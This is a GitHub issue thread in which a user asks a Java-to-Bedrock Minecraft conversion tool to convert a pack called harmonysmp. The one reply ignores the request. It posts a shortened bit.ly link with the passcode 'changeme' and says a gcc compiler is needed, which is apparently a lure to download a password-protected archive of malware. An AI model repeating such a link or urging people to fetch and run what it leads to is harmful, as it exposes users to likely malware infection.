### ISSUE TITLE
[Pack]: harmonysmp

### ISSUE THREAD

**Issue by netcore10** [Kas-tle/java2bedrock.sh#34064]
### Java Pack Direct Download URL

http://atlas.oraxen.com:8080/pack.zip?id=7159b20446e1370ae3569dfbbdc33122cc48719b

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
